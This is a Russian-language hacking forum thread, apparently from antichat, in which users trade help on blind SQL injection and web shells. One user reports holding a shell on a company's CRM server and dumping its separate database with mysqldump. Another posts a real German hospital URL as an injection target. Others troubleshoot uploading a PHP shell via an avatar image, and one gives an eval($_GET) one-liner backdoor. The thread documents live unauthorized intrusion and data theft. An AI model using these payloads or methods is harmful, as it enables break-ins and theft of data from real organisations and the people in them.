это blind sql Про инекции и Способы обнаружения Blind SQL-инъекций: https://www.ptsecurity.com/upload/corporate/ru-ru/download/PT-devteev-Advanced-SQL-Injection.pdf софт:https://forum.antichat.ru/threads/240692/ или ручками крути
http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf Все подробно и ясно - Page №22
Спасибо. Парни, такой вопрос, есть сервер удаленный на нем шелл. Это файловый сервер целого CRM. Есть сервер базы данных этого же ЦРМ, но он отдельный. Подключится - могу. С сервера на сервер. Дампнуть не получается. Коннект обрывается посли 20 мб данных. А дампить много. Как быть?
такс, mysqldump мне помог. Приступаю к курению мануала. Кстати, несколько лет назад я был мал и глуп и вы меня не долюбливали. Писал под ником Pirotexnik. Потом в армию забрали) Всем доброй ночи :3
Code: http://www.klinikum-stuttgart.de/kliniken-institute-zentren/frauenklinik-schwerpunkt-geburtshilfe/termine-und-veranstaltungen/?tx_aseventcalendar[attendant]=6 тока блинд? или у когото вывод получится сделать?
После заливки шелла, при переходе на шелл, становится битый код, и файл выглядит вот так, в чем может быть проблема ? http://prntscr.com/ewegs9 возможно не правильный линк? заливал через картинку
если бы путь был не правильный - он бы у тебя вообще не открылся посмотри сорцы открываемой страницы, есть в начале пхп код <?php ? если есть значит пхп не обрабатывается сервером, вероятно настройки nginx/htaccess
А у меня вот такая ошибка, когда перехожу по - аватарке http://prntscr.com/eweule в начале <?php стоит
всё таки проблема с путями, потому что картинка даже открывается в тексте! помогите найти путь пожалуйста до шелла!
возможно нет прав для выполнения. Попробуй в аватарку встроить не большой шелл типа <?php; eval($_GET['a']);?> и потом обратитьтся avatarka.jpg.php?a=phpinfo();
Файл открывается по такой ссылке site.com/user/12345/avatar?123456, где просто выводится содержимое файла, без разницы на расширение, то есть мы получаем его контент, а не выполнение. Так как даже картинка, выводится текстом, отсюда обычная читалка. Получить полный путь до файлов заливаемых на сервер возможности нет (видно что об этом позаботились), что бы понять где и как они лежат и в какой расширение приходят на сервер, возможно оно и заливается в .php, но обратиться к файлу мы не можем, потому всякие догадки про права не верны! З.Ы. Не стоит делать поспешных выводов не зная сути проблемы! Надеюсь я ясно объяснил и вопросы лишние отпадут.